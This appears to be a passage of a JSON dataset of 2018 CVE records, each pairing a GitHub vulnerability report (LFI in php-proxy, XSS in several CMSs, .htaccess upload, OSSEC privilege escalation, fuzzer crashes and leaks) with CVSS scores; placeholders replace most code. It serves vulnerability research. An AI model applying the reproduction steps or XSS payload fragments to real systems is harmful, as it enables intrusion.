NUMBERTAG REDIR NUMBERTAG c2c NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d2d0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2e NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG cff NUMBERTAG APITAG redirected to NUMBERTAG e0 (rinde NUMBERTAG REDIR NUMBERTAG cff8d0 APITAG redirected to NUMBERTAG a0 (strlen NUMBERTAG REDIR NUMBERTAG c NUMBERTAG c0 APITAG redirected to NUMBERTAG malloc NUMBERTAG REDIR NUMBERTAG cecc NUMBERTAG APITAG redirected to NUMBERTAG a NUMBERTAG strcpy NUMBERTAG REDIR NUMBERTAG cdb0a0 APITAG redirected to NUMBERTAG a NUMBERTAG strcmp NUMBERTAG REDIR NUMBERTAG c NUMBERTAG c NUMBERTAG APITAG redirected to NUMBERTAG free NUMBERTAG REDIR NUMBERTAG cffe NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG memmove NUMBERTAG REDIR NUMBERTAG cff NUMBERTAG APITAG redirected to NUMBERTAG ccd0 (strchrnul NUMBERTAG REDIR NUMBERTAG cffdf0 APITAG redirected to NUMBERTAG cde0 (mempcpy) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: ignoring unknown marker segment NUMBERTAG ff NUMBERTAG type NUMBERTAG ff NUMBERTAG UNKNOWN); len NUMBERTAG c NUMBERTAG ff ff ff ff ff ff ff NUMBERTAG ff ff ff NUMBERTAG warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes NUMBERTAG REDIR NUMBERTAG d NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG memset NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGABRT NUMBERTAG at NUMBERTAG BDAF3B: raise APITAG NUMBERTAG by NUMBERTAG BDC2F0: abort APITAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG E3E0: jpc_dec_decode APITAG NUMBERTAG by NUMBERTAG E3E0: jpc_decode APITAG NUMBERTAG by NUMBERTAG AA NUMBERTAG jas_image_decode APITAG NUMBERTAG by NUMBERTAG A7E3: main APITAG NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG Searching for pointers to NUMBERTAG not freed blocks NUMBERTAG Checked NUMBERTAG bytes NUMBERTAG bytes in NUMBERTAG blocks are definitely lost in loss record NUMBERTAG of NUMBERTAG at NUMBERTAG BF: malloc APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG jas_malloc APITAG NUMBERTAG by NUMBERTAG F NUMBERTAG jpc_unk_getparms APITAG NUMBERTAG by NUMBERTAG FA9FA: jpc_getms APITAG NUMBERTAG by NUMBERTAG E1AB: jpc_dec_decode APITAG NUMBERTAG by NUMBERTAG E1AB: jpc_decode APITAG NUMBERTAG by NUMBERTAG AA NUMBERTAG jas_image_decode APITAG NUMBERTAG by NUMBERTAG A7E3: main APITAG NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Reachable blocks (those to which a pointer was found) are not shown NUMBERTAG To see them, rerun with: leak check=full show leak kinds=all NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Aborted PATHTAG jasper input APITAG output FILETAG output format bmp warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: ignoring unknown marker segment NUMBERTAG ff NUMBERTAG type NUMBERTAG ff NUMBERTAG UNKNOWN); len NUMBERTAG c NUMBERTAG ff ff ff ff ff ff ff NUMBERTAG ff ff ff NUMBERTAG warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) Aborted Attached the POC FILETAG Version jasper NUMBERTAG Found by:TAN JIE",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-19246",
        "Issue_Url_old": "https://github.com/Athlon1600/php-proxy-app/issues/134",
        "Issue_Url_new": "https://github.com/athlon1600/php-proxy-app/issues/134",
        "Repo_new": "athlon1600/php-proxy-app",
        "Issue_Created_At": "2018-11-13T04:06:52Z",
        "description": "PHP Proxy NUMBERTAG Local File Inclusion (LFI) Vulnerability (on default pre installed version). Brief description of this vulnerability: Downloadable pre installed version of PHP Proxy NUMBERTAG current as of this posting day) from www.php proxy.com ( FILETAG make use of a default app_key wherein can be used for local file inclusion attacks. This can be used to generate encrypted string which can gain access to arbitrary local files in the server. (example: _ URLTAG Affected Version NUMBERTAG pre installed version) Reason of this vulnerability: The downloadable pre installed version of PHP Proxy NUMBERTAG current pre installed version as of this posting day) from www.php proxy.com ( FILETAG already contains the default app_key in FILETAG file which might be used by several users using the application thus is vulnerable to local file inclusion. APITAG Encrypted URL value lies on the app_key as seen on a snippet of code below. ERRORTAG Wherein which the key is the encryption_key and by default, its value depends on the md5 hash of app_key and the visiting IP address. CODETAG Combining all the functions above, an encrypted URL can be generated which contains the local file inclusion vulnerability payload. Proof of Concept: Code below will output an encrypted string which can exploit the local file inclusion vulnerability. Add the encrypted string on the PHP Proxy NUMBERTAG application URL: example: _ URLTAG (replace APITAG with the generated encrypted string value) ERRORTAG Below screenshot is an example of gaining an encrypted URL string within which used to read the PATHTAG of the server. FILETAG Impact: Gain access to arbitrary local files in the server. Suggested Mitigation: There is already a FILETAG included on the downloadable pre installed version of PHP Proxy which will generate and overwrite the default app_key, however users most probably don't use it and kept on using the default app_key. Possible mitigation is make the app_key value in the FILETAG blank and make users just make use of the FILETAG to generate and overwrite the default app_key.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19416",
        "Issue_Url_old": "https://github.com/sysstat/sysstat/issues/196",
        "Issue_Url_new": "https://github.com/sysstat/sysstat/issues/196",
        "Repo_new": "sysstat/sysstat",
        "Issue_Created_At": "2018-11-21T03:26:28Z",
        "description": "bug report]: out of bound read in sadf which may lead to code execution. Information: version: APITAG related APITAG ERRORTAG Description: APITAG doesn't check the args and sadf crashes when the args is invalid. The following is my debug info ERRORTAG If we control src and n of memmove , stack overflow may happen which lead to ROP even code execution! ASAN ERRORTAG [poc here URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-19423",
        "Issue_Url_old": "https://github.com/Codiad/Codiad/issues/1098",
        "Issue_Url_new": "https://github.com/codiad/codiad/issues/1098",
        "Repo_new": "codiad/codiad",
        "Issue_Created_At": "2018-11-11T16:26:19Z",
        "description": "APITAG Execution of upload files.. Hello, I have a question about management of uploaded file in your application. Is it intended behavior that uploaded files are executable? I checked that Codiad has not the mitigations for execution of uploaded file. Even though uploading feature needs administrator credential, execution of uploaded file is still dangerous. I think it needs to the mitigations like compressing/encoding upload file or hide the upload path.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-19424",
        "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/495",
        "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/495",
        "Repo_new": "clippercms/clippercms",
        "Issue_Created_At": "2018-11-14T08:19:01Z",
        "description": "APITAG NUMBERTAG allows to upload htaccess file in default setting.. Brief of this vulnerability APITAG allows to upload .htaccess. It is able to execute the any types of the extensions as PHP scripts. Test Environment APITAG APITAG PHP NUMBERTAG APITAG (cli) Affect version NUMBERTAG Reason of This Vulnerability .htaccess is allowed to upload in your default whitelist. It should be removed in default whitelist. It can change the access configuration about current directory and subdirectories. Even this file can drive to execute any extensions as PHP script. This vulnerability needs admin credentials, but it can be used to get system shell to adversary who get the admin authority using other attack( e.g. XSS ).",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-19654",
        "Issue_Url_old": "https://github.com/Venan24/SCMS/issues/1",
        "Issue_Url_new": "https://github.com/venan24/scms/issues/1",
        "Repo_new": "venan24/scms",
        "Issue_Created_At": "2018-11-28T07:26:36Z",
        "description": "smcs NUMBERTAG arbitrarily account register . smcs NUMBERTAG arbitrarily account register via FILETAG firstly,register an account test|test FILETAG then,let's see the issue code ERRORTAG we can see the parameter was validated by the function of APITAG we can not use some special characters.but when database meets %c2,it will be identified as a invalid character and also fit the ruler of the function APITAG thus.We can register another test finally,register other account test%c NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19666",
        "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1585",
        "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1585",
        "Repo_new": "ossec/ossec-hids",
        "Issue_Created_At": "2018-11-28T06:22:52Z",
        "description": "Windows Agent Priv Esc to nt authority\\system. There's a directory traversal issue on the local windows OSSEC agent that allows a low privilege user to become nt authority\\system if they have access to the OSSEC server. Requirements to exploit NUMBERTAG Full access to the OSSEC server NUMBERTAG Low privileged access to a windows system that has the ossec hids agent installed.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-19751",
        "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/83",
        "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/83",
        "Repo_new": "domainmod/domainmod",
        "Issue_Created_At": "2018-11-23T10:28:40Z",
        "description": "Stored XSS vulnerability in Custom SSL Fields. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps NUMBERTAG Goto vulnerable endpoint NUMBERTAG At the place of Display Name, Description, notes put xss payload \"> APITAG POC FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-19785",
        "Issue_Url_old": "https://github.com/Athlon1600/php-proxy-app/issues/140",
        "Issue_Url_new": "https://github.com/athlon1600/php-proxy-app/issues/140",
        "Repo_new": "athlon1600/php-proxy-app",
        "Issue_Created_At": "2018-11-30T07:29:06Z",
        "description": "PHP Proxy ver NUMBERTAG have Cross Site Scripting (XSS) Vulnerability. PHP Proxy before NUMBERTAG has Cross Site Scripting (XSS) via the URL field in APITAG . Ref. FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19837",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2659",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2659",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2018-06-02T07:24:05Z",
        "description": "APITAG stack overflow in APITAG APITAG We found with our fuzzer some stack over flow errors in APITAG APITAG APITAG when compiled with Address Sanitizer (using sassc as the driver). ERRORTAG Sample input files: FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19840",
        "Issue_Url_old": "https://github.com/dbry/WavPack/issues/53",
        "Issue_Url_new": "https://github.com/dbry/wavpack/issues/53",
        "Repo_new": "dbry/wavpack",
        "Issue_Created_At": "2018-11-26T15:27:04Z",
        "description": "Infinite loop when block_samples NUMBERTAG using wavpack. As to NUMBERTAG wavpack might trigger an infinite loop at APITAG due to mis calculation of APITAG . wavpack blocksize NUMBERTAG h $FILE o /tmp/test.wv y example input wav files: FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-19849",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/8",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/8",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2018-11-08T15:47:22Z",
        "description": "APITAG NUMBERTAG SS bug. Hi, I would like to report Cross Site Scripting vulnerability in APITAG NUMBERTAG Description: Cross site scripting (XSS) vulnerability in search pages and you can inject arbitrary web script or HTML via the multiple parameters. In the FILETAG row NUMBERTAG No filtering of the searinfo parameter FILETAG Steps To Reproduce NUMBERTAG login to administrator panel. APITAG below URL in browser which supports flash. url: URLTAG {xsspayload}&dosubmit NUMBERTAG eg: xsspayload=\"> APITAG alert NUMBERTAG APITAG FILETAG FILETAG Fix: Filter the searinfo parameter",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-20060",
        "Issue_Url_old": "https://github.com/urllib3/urllib3/issues/1316",
        "Issue_Url_new": "https://github.com/urllib3/urllib3/issues/1316",
        "Repo_new": "urllib3/urllib3",
        "Issue_Created_At": "2018-01-17T01:02:04Z",
        "description": "Auth header remains during redirects. Requests does it: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20195",
        "Issue_Url_old": "https://github.com/knik0/faad2/issues/25",
        "Issue_Url_new": "https://github.com/knik0/faad2/issues/25",
        "Repo_new": "knik0/faad2",
        "Issue_Created_At": "2018-12-17T06:25:35Z",
        "description": "Null pointer dereference vulnerability in ic_predict APITAG Hi, i found a null pointer dereference bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function ic_predict .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20199",
        "Issue_Url_old": "https://github.com/knik0/faad2/issues/24",
        "Issue_Url_new": "https://github.com/knik0/faad2/issues/24",
        "Repo_new": "knik0/faad2",
        "Issue_Created_At": "2018-12-17T06:22:35Z",
        "description": "Null pointer dereference vulnerability in APITAG Hi, i found a null pointer dereference bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function ifilter_bank.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20362",
        "Issue_Url_old": "https://github.com/knik0/faad2/issues/26",
        "Issue_Url_new": "https://github.com/knik0/faad2/issues/26",
        "Repo_new": "knik0/faad2",
        "Issue_Created_At": "2018-12-17T06:28:49Z",
        "description": "Null pointer dereference vulnerability in ifilter_bank APITAG Hi, i found a null pointer dereference bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function ifilter_bank.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20405",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/354",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/354",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2018-12-21T06:22:47Z",
        "description": "Information Disclosure APITAG Authentication). I found a information leakage vulnerabilities in APITAG CMS, you need to login the backstage first. Steps to reproduce: APITAG in to the backstage URLTAG APITAG some contents APITAG the page and see APITAG create and publish APITAG and update FILETAG FILETAG FILETAG This vulnerability reveals the full path of bigtree CMS Let's look at the code: FILETAG The parameters of post are not restricted,so it will be evali it in wrong\u3002",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 2.7,
        "impactScore": 1.4,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-20426",
        "Issue_Url_old": "https://github.com/libming/libming/issues/162",
        "Issue_Url_new": "https://github.com/libming/libming/issues/162",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-09-21T08:39:32Z",
        "description": "Null pointer dereference in APITAG (decompile.c). A null pointer dereference bug was found in function APITAG (in master version,not the issue NUMBERTAG CODETAG to reproduce it ,run swftopython with APITAG APITAG poc file URLTAG credit: APITAG of Venustech FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20428",
        "Issue_Url_old": "https://github.com/libming/libming/issues/161",
        "Issue_Url_new": "https://github.com/libming/libming/issues/161",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-09-21T08:24:35Z",
        "description": "Null pointer dereference in strlenext (decompile.c). A null pointer dereference bug was found in function APITAG ERRORTAG to reproduce it ,run swftopython with APITAG APITAG poc file URLTAG credit: APITAG of Venustech FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20429",
        "Issue_Url_old": "https://github.com/libming/libming/issues/160",
        "Issue_Url_new": "https://github.com/libming/libming/issues/160",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-09-21T03:21:35Z",
        "description": "Null pointer dereference in APITAG (decompile.c). A null pointer dereference bug was found in function APITAG ERRORTAG to reproduce it ,run swftophp with APITAG APITAG poc file URLTAG credit: APITAG of Venustech FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20437",
        "Issue_Url_old": "https://github.com/wuyouzhuguli/FEBS-Shiro/issues/40",
        "Issue_Url_new": "https://github.com/wuyouzhuguli/febs-shiro/issues/40",
        "Repo_new": "wuyouzhuguli/FEBS-Shiro",
        "Issue_Created_At": "2018-11-05T06:27:16Z",
        "description": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e. APITAG Shiro\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e\uff0c\u8be6\u7ec6\u4fe1\u606f\u5982\u4e0b\uff1a FILETAG APITAG FILETAG FILETAG NUMBERTAG FILETAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20455",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/12373",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12373",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-12-02T15:20:44Z",
        "description": "APITAG stack buffer overflow at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a0cfcdd commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with error message. Actual behavior rasm2 crashes. ERRORTAG Steps to reproduce the behavior run APITAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20459",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/12418",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12418",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-12-05T16:26:17Z",
        "description": "APITAG heap buffer overflow (OOB read) at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f2e NUMBERTAG c3 commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with error message. Actual behavior rasm2 crashes. ERRORTAG Steps to reproduce the behavior compile radare with asan (tried O3/ O0) run APITAG FILETAG Additional Logs, screenshots, source code, configuration dump, ... Index j may reach length of str inside APITAG .",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20545",
        "Issue_Url_old": "https://github.com/cacalabs/libcaca/issues/37",
        "Issue_Url_new": "https://github.com/cacalabs/libcaca/issues/37",
        "Repo_new": "cacalabs/libcaca",
        "Issue_Created_At": "2018-12-29T03:23:35Z",
        "description": "CVETAG . Following vulnerability has been reported to Red Hat issue tracker: CVETAG CVETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20570",
        "Issue_Url_old": "https://github.com/mdadams/jasper/issues/191",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/191",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2018-12-28T07:22:38Z",
        "description": "Heap buffer overflow in APITAG at jasper version NUMBERTAG and master branch. A crafted input will lead to heap buffer overflow failed in APITAG at jasper version NUMBERTAG and master branch Triggered by ./jasper output /dev/null output format jp2 input PATHTAG Poc FILETAG The ASAN information is as follows: ERRORTAG APITAG wu.an. EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20622",
        "Issue_Url_old": "https://github.com/mdadams/jasper/issues/193",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/193",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2018-12-31T06:29:37Z",
        "description": "memory leaks in jpc_dec_decodepkts . hi,jasper team,when i convert jp2 file,i found a memory leak bug reported by APITAG the version is NUMBERTAG FILETAG ./jasper input jasper jpc_dec_decodepkts memory leak output /dev/null output format jp2 warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) alignment failed jpc_dec_decodepkts failed error: cannot decode code stream error: cannot load image data APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f9eb ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG NUMBERTAG f2b6de8b1b0 ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f9eb ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f9eb ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f9eb ( PATHTAG NUMBERTAG f2b6de NUMBERTAG e5 ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG NUMBERTAG f2b6de NUMBERTAG f ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG NUMBERTAG f2b6de NUMBERTAG e5 ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f9eb ( PATHTAG NUMBERTAG f2b6de NUMBERTAG f ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG NUMBERTAG f2b6de8b1b0 ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6df3c NUMBERTAG PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG NUMBERTAG f2b6de NUMBERTAG 